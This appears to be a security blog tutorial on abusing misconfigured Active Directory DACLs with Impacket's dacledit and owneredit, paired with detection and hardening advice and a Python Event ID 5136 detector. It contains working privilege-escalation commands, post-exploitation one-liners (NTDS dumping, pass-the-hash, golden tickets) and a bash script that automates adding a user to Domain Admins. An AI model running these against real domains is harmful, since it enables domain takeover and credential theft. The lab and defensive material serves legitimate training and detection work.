
Introduction:
Active Directory (AD) security relies heavily on Discretionary Access Control Lists (DACLs) to define permissions on objects like users, groups, and computers. However, misconfigured DACLs—such as granting WriteDACL, WriteOwner, or FullControl to non-privileged users—create critical privilege escalation pathways. Attackers leverage tools like Impacket’s `dacledit` to modify these ACLs, granting themselves Domain Admin rights or resetting passwords without current credentials. Understanding these attacks is essential for both red teamers and blue teams to harden AD environments.
Learning Objectives:
- Understand how DACL misconfigurations in Active Directory enable privilege escalation.
- Learn to enumerate and abuse WriteDACL, WriteOwner, and FullControl permissions using Impacket-dacledit.
- Implement detection and mitigation strategies to prevent DACL-based attacks.
You Should Know:
1. Setting Up Your Lab for DACL Abuse
Before exploiting DACLs, you need a controlled Active Directory lab environment. Use virtualization software (VMware/VirtualBox) with a domain controller (Windows Server 2019/2022) and a client machine (Windows 10/11). Install Kali Linux as your attack machine.
Step‑by‑step guide:
1. Deploy Domain Controller – Install Windows Server, promote it to a domain controller (e.g., `lab.local`), and create a standard user (e.g., `john.doe`).
2. Install Impacket on Kali – Impacket is included in Kali by default. Update it:
```bash
sudo apt update && sudo apt install impacket-scripts
# Or from source for the latest features
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
```
3. Create a Misconfiguration – On the DC, use `dsacls` or ADUC to delegate the `WriteDACL` permission over the `Domain Admins` group to `john.doe`. Using PowerShell as Domain Admin (requires the ActiveDirectory module, which provides the `AD:` drive):
```powershell
$group = Get-ADGroup "Domain Admins"
$user  = Get-ADUser "john.doe"
$acl   = Get-Acl "AD:$($group.DistinguishedName)"
$rule  = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($user.SID, "WriteDACL", "Allow")
$acl.AddAccessRule($rule)
Set-Acl "AD:$($group.DistinguishedName)" $acl
```
Note that `Domain Admins` is a protected group: the AdminSDHolder process (SDProp) re-stamps its DACL from `CN=AdminSDHolder,CN=System,DC=lab,DC=local` every 60 minutes by default, so this delegation is silently reverted unless you test within that window or delegate over an unprotected group instead. The same mechanism is why the ACL of `AdminSDHolder` itself belongs on every audit list.
4. Verify – On Kali, test connectivity: `ping dc.lab.local` and `crackmapexec smb dc.lab.local -u john.doe -p 'Password123'`.
2. Enumerating AD Object Permissions with PowerView and BloodHound
You must identify which objects you can modify. Use PowerView (part of PowerSploit) on a Windows machine or BloodHound for visualization.
Step‑by‑step guide (Linux/Windows):
1. From a compromised Windows machine (PowerView):
```powershell
# Import the module
Import-Module .\PowerView.ps1
# Find all ACEs on Domain Admins that apply to the current user
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | Where-Object { $_.SecurityIdentifier -eq (Get-DomainUser -Identity john.doe).objectsid }
```
2. From Kali using BloodHound (recommended):
```bash
# Install BloodHound and Neo4j
sudo apt install bloodhound neo4j
sudo neo4j console
# Run SharpHound on Windows to collect data, then transfer the zip to Kali and import it into BloodHound
```
Then run this Cypher query in BloodHound to list every user holding a dangerous edge to a group:
```cypher
MATCH p=(u:User)-[r:WriteDacl|WriteOwner|GenericAll]->(g:Group) RETURN p
```
3. Using Impacket's own `dacledit` to enumerate:
`dacledit.py` can also list ACEs. Syntax (`-target-dn` takes the object's distinguished name; `-principal` takes a sAMAccountName and restricts the listing to ACEs that apply to that account):
```bash
dacledit.py -action read -target-dn "CN=Domain Admins,CN=Users,DC=lab,DC=local" -principal john.doe lab.local/john.doe:'Password123'@dc.lab.local
```
3. Abusing WriteDACL to Grant FullControl Over a Group
WriteDACL allows you to modify the ACL of a target object. Attackers can add an ACE that grants themselves FullControl, then add their user to the protected group.
Step‑by‑step guide using Impacket-dacledit:
1. Identify target – Suppose `john.doe` has WriteDACL over `Domain Admins`.
2. Grant FullControl to `john.doe` over `Domain Admins`:
```bash
dacledit.py -action write -rights FullControl -principal john.doe -target-dn "CN=Domain Admins,CN=Users,DC=lab,DC=local" lab.local/john.doe:'Password123'@dc.lab.local
```
3. Now add `john.doe` to Domain Admins using `net rpc` or `adduser.py`:
```bash
net rpc group addmem "Domain Admins" john.doe -U "lab.local/john.doe%Password123" -S dc.lab.local
```
4. Verify – `net rpc group members "Domain Admins" -U "lab.local/john.doe%Password123" -S dc.lab.local` should show the user.
Mitigation: Audit ACL changes. Monitor Event ID 5136 (Directory Service Changes) for modifications to sensitive groups. The event records the object DN, the attribute name (`nTSecurityDescriptor`) and the new value in SDDL form, so the added ACE and the SID it was granted to are visible in the log; it requires the "Audit Directory Service Changes" subcategory to be enabled and a SACL on the object that audits writes. Because SDProp removes a rogue ACE from a protected group within 60 minutes, alert on the change event itself rather than relying on periodic ACL scans to catch it.
4. WriteOwner Abuse: Taking Ownership of a Domain Object
If a user has WriteOwner permission on an object (e.g., a user account), they can change the owner to themselves. The owner implicitly holds ReadControl and WriteDACL on the object, so FullControl follows from a single added ACE, enabling password resets or further privilege escalation.
Step‑by‑step guide:
1. Check WriteOwner – Use BloodHound or PowerView:
```powershell
# ActiveDirectoryRights is usually a combined value such as "WriteOwner, WriteDacl", so match rather than compare
Get-DomainObjectAcl -Identity "target_user" | Where-Object { $_.ActiveDirectoryRights -match "WriteOwner" }
```
2. Change the owner with Impacket's `owneredit.py`, the companion to `dacledit.py` (`dacledit.py -rights` only accepts FullControl, ResetPassword, WriteMembers and DCSync, so it has no WriteOwner value):
```bash
owneredit.py -action write -new-owner john.doe -target-dn "CN=TargetUser,CN=Users,DC=lab,DC=local" lab.local/john.doe:'Password123'@dc.lab.local
```
3. As owner you hold WriteDACL implicitly, so FullControl follows exactly as in the previous section. You can then reset the target user's password without knowing the current one:
```bash
# smbpasswd -r needs the user's current password, so it cannot perform a reset; an administrative reset goes through SAMR
net rpc password TargetUser 'NewPass123!' -U "lab.local/john.doe%Password123" -S dc.lab.local
```
Or use Impacket's `secretsdump.py` to extract hashes.
5. Post-Exploitation: Dumping Credentials and Lateral Movement
Once you have Domain Admin privileges, the domain is compromised. Use Impacket's suite for further actions.
Step‑by‑step guide:
- Dump NTDS.dit – `secretsdump.py lab.local/administrator:'AdminPass'@dc.lab.local -just-dc`
- Pass‑the‑Hash – `psexec.py lab.local/administrator@target-machine -hashes aad3b435b51404eeaad3b435b51404ee:hash`
- Create Golden Ticket – Use `ticketer.py` after obtaining the krbtgt hash.
- Persist via Skeleton Key – `mimikatz` or `lsadump::dcshadow` (requires domain admin).
Detection: Enable advanced audit policies (Audit Detailed Directory Service Replication, Audit Kerberos Authentication Service). Deploy SIEM rules for unusual `dacledit` network traffic (port 445, 135, RPC calls). Note that `dacledit.py` itself writes the `nTSecurityDescriptor` attribute over LDAP (389/636 to the DC), so the direct signal for the ACE change is an LDAP modify against a privileged object and the resulting Event ID 5136; traffic on 445/135 covers the `net rpc`, `psexec.py` and `secretsdump.py` activity that follows, and a DCSync from `secretsdump.py -just-dc` surfaces as Event ID 4662 with the DS-Replication-Get-Changes control access rights. Monitor for rapid changes to group memberships.
6. Defensive Hardening: Removing Dangerous DACLs and Monitoring
Blue teams must proactively scan for and remove dangerous ACL misconfigurations.
Step‑by‑step guide:
1. Identify risky ACEs using PowerShell (requires the ActiveDirectory module; the `AD:` drive exposes object ACLs to `Get-Acl`):
```powershell
$sensitiveObjects = @("Domain Admins", "Enterprise Admins", "Schema Admins", "Administrator")
foreach ($obj in $sensitiveObjects) {
    Get-Acl "AD:CN=$obj,CN=Users,DC=lab,DC=local" |
        Select-Object -ExpandProperty Access |
        Where-Object {
            # IdentityReference is DOMAIN\name, so an exact "Domain Admins" comparison never matches;
            # list the principals expected to hold these rights and tune it to your environment
            $_.IdentityReference -notmatch "Domain Admins|Enterprise Admins|Administrators|SYSTEM" -and
            $_.ActiveDirectoryRights -match "WriteDacl|WriteOwner|GenericAll"
        }
}
```
`CN=AdminSDHolder,CN=System,DC=lab,DC=local` deserves the same check, since its DACL is copied onto every protected group and account by SDProp.
2. Remove excessive permissions – Use `dsacls` or ADUC.
3. Implement AD Administrative Tier Model – Separate privileged accounts, use Privileged Access Workstations (PAWs).
4. Deploy Microsoft Defender for Identity – Detects ACL modifications and suspicious Impacket tool usage.
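To turn the Event ID 5136 guidance from sections 3 and 5 and the ACL scan in section 6 into something that runs against log data, here is an added example written for this post (not code from Impacket or from the original article). It parses the SDDL string that Event ID 5136 carries as the new `nTSecurityDescriptor` value, flags any allow ACE that hands WriteDACL, WriteOwner or FullControl to a SID outside an expected administrative set, and checks the owner field, which is the signal for the WriteOwner abuse in section 4. It assumes the event has already been turned into a dict keyed by the field names Windows uses in the event XML (`EventID`, `SubjectUserName`, `ObjectDN`, `AttributeLDAPDisplayName`, `OperationType`, `AttributeValue`); the lab DNs, SIDs, descriptors and sample events are constructed.

```python
"""Flag ACEs that grant WriteDACL, WriteOwner or FullControl to principals outside
the expected administrative set, and raise alerts from Event ID 5136 records that
carry such a change. Added example for this post, not code from Impacket or from
the original article. It works on the SDDL string form of an AD security descriptor,
which is how Event ID 5136 reports a modified nTSecurityDescriptor. The lab DNs,
SIDs, sample descriptors and sample event records are constructed."""
import re

# SDDL two-letter right codes that let a principal rewrite or take over an object.
DANGEROUS_RIGHTS = {"WD": "WriteDACL", "WO": "WriteOwner", "GA": "FullControl"}
# The same rights as access-mask bits, for ACEs written with a hex mask instead of codes.
DANGEROUS_MASK_BITS = {0x00040000: "WriteDACL",    # WRITE_DAC
                       0x00080000: "WriteOwner",   # WRITE_OWNER
                       0x10000000: "FullControl"}  # GENERIC_ALL
# Well-known SID aliases expected to hold these rights on protected objects:
# Domain Admins, Enterprise Admins, Schema Admins, Builtin Administrators, SYSTEM.
TRUSTED_SIDS = {"DA", "EA", "SA", "BA", "SY"}
# Objects whose DACL should never change outside a change window (constructed lab DNs).
PROTECTED_DNS = {"CN=Domain Admins,CN=Users,DC=lab,DC=local",
                 "CN=AdminSDHolder,CN=System,DC=lab,DC=local"}

OWNER_RE = re.compile(r"O:(.*?)(?=G:|D:|S:|$)")      # O:<owner sid>
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^()]*\))*)")   # D:<flags>(ace)(ace)...
ACE_RE = re.compile(r"\(([^()]*)\)")                 # one (type;flags;rights;;;sid)


def rights_from_field(field):
    """Map an ACE rights field (codes such as 'RPWPWDWO' or a hex mask) to the
    set of dangerous right names it contains."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {name for bit, name in DANGEROUS_MASK_BITS.items() if mask & bit}
    found = set()
    for i in range(0, len(field), 2):          # codes are fixed two-letter pairs
        code = field[i:i + 2]
        if code in DANGEROUS_RIGHTS:
            found.add(DANGEROUS_RIGHTS[code])
    return found


def risky_aces(sddl, trusted=TRUSTED_SIDS):
    """Return [(sid, [rights...])] for every access-allowed ACE in the DACL that
    grants a dangerous right to a principal outside the trusted set."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    hits = []
    for ace in ACE_RE.findall(m.group(1)):
        fields = ace.split(";")
        if len(fields) < 6:
            continue                           # malformed ACE: skip, do not guess
        ace_type, rights, sid = fields[0], fields[2], fields[5]
        if ace_type not in ("A", "OA"):        # only allow ACEs grant anything
            continue
        dangerous = rights_from_field(rights)
        if dangerous and sid not in trusted:
            hits.append((sid, sorted(dangerous)))
    return hits


def untrusted_owner(sddl, trusted=TRUSTED_SIDS):
    """Return the owner SID if it lies outside the trusted set (the WriteOwner
    abuse case), otherwise None."""
    m = OWNER_RE.match(sddl)
    if m and m.group(1) not in trusted:
        return m.group(1)
    return None


def alerts_from_5136(events, protected=PROTECTED_DNS):
    """Scan Event ID 5136 records (dicts keyed by the event's field names) and
    return one alert string per dangerous change to a protected object."""
    alerts = []
    for ev in events:
        if (ev.get("EventID") != 5136
                or ev.get("AttributeLDAPDisplayName") != "nTSecurityDescriptor"
                or ev.get("OperationType") != "%%14674"      # %%14674 = Value Added
                or ev.get("ObjectDN") not in protected):
            continue
        new_sd = ev.get("AttributeValue", "")
        who, dn = ev.get("SubjectUserName", "?"), ev["ObjectDN"]
        for sid, rights in risky_aces(new_sd):
            alerts.append(f"{who} granted {sid} {','.join(rights)} on {dn}")
        owner = untrusted_owner(new_sd)
        if owner:
            alerts.append(f"{who} set owner of {dn} to {owner}")
    return alerts


# Constructed sample: the old/new value pair that an ACE addition produces on a
# protected group, followed by an unrelated membership change that must not alert.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "john.doe",
     "ObjectDN": "CN=Domain Admins,CN=Users,DC=lab,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14675",
     "AttributeValue": "O:DAG:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;;RPLCLORC;;;AU)"},
    {"EventID": 5136, "SubjectUserName": "john.doe",
     "ObjectDN": "CN=Domain Admins,CN=Users,DC=lab,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674",
     "AttributeValue": "O:DAG:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;;RPLCLORC;;;AU)"
                       "(A;;GA;;;S-1-5-21-1111-2222-3333-1105)"},
    {"EventID": 5136, "SubjectUserName": "svc-backup",
     "ObjectDN": "CN=Finance,OU=Groups,DC=lab,DC=local",
     "AttributeLDAPDisplayName": "member", "OperationType": "%%14674",
     "AttributeValue": "CN=bob,CN=Users,DC=lab,DC=local"},
]

if __name__ == "__main__":
    for alert in alerts_from_5136(SAMPLE_EVENTS):
        print(alert)
```

Only the "Value Added" half of the 5136 pair is evaluated, because the "Value Deleted" record carries the old descriptor and would otherwise double-count. The trusted set is deliberately small; an environment with delegated tier-0 service accounts should extend it with their real SIDs rather than loosen the rights check.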
7. Simulating the Attack for Red Team Exercises
To practice, write a bash script that automates the WriteDACL abuse chain.
```bash
#!/bin/bash
# Usage: ./dacledit_poc.sh domain controller user password target_group_dn
DOMAIN=$1
DC=$2
USER=$3
PASS=$4
TARGET=$5   # distinguished name, e.g. "CN=Domain Admins,CN=Users,DC=lab,DC=local"
# Group CN extracted from the DN for the net rpc calls
GROUP_CN=$(echo "$TARGET" | cut -d',' -f1 | cut -d'=' -f2)

echo "[*] Granting FullControl to $USER on $TARGET"
dacledit.py -action write -rights FullControl -principal "$USER" -target-dn "$TARGET" "$DOMAIN/$USER:$PASS@$DC"
echo "[*] Adding $USER to $GROUP_CN"
net rpc group addmem "$GROUP_CN" "$USER" -U "$DOMAIN/$USER%$PASS" -S "$DC"
echo "[*] Verifying membership"
net rpc group members "$GROUP_CN" -U "$DOMAIN/$USER%$PASS" -S "$DC"
```
What Undercode Say:
- Key Takeaway 1: WriteDACL and WriteOwner are among the most dangerous misconfigurations in Active Directory – they allow a low-privileged user to fully compromise the domain without any exploit or vulnerability.
- Key Takeaway 2: Impacket’s `dacledit.py` provides a reliable, scriptable method for both attacking and testing AD permissions. Defenders must regularly audit DACLs using tools like BloodHound and PowerShell, and implement real-time monitoring for ACE modifications.
Analysis: The rise of DACL-based attacks reflects a shift from memory corruption exploits to “living off the land” and misconfiguration abuse. Many organizations focus on patching and malware defense while ignoring internal permission sprawl. A single overlooked WriteDACL delegation can hand over the keys to the kingdom. Red teams should prioritize ACL enumeration; blue teams must treat AD as a critical data source, not just an authentication service. Integrating DACL hygiene into regular security posture reviews is non‑negotiable.
Prediction:
As organizations adopt zero-trust and cloud‑hybrid identities, misconfigured ACLs will remain a top initial access vector. Attackers will increasingly automate DACL enumeration with tools like BloodHound CE and Purple Knight, and Impacket will evolve to support Azure AD permissions. Microsoft may introduce “break‑glass” ACL auditing by default, but legacy on‑prem AD environments will remain vulnerable for years. Expect to see DACL abuse integrated into major ransomware playbooks as a stealthy domain escalation method.
Reported By: Nishaasharmaa Cybersecurity – Hackers Feeds


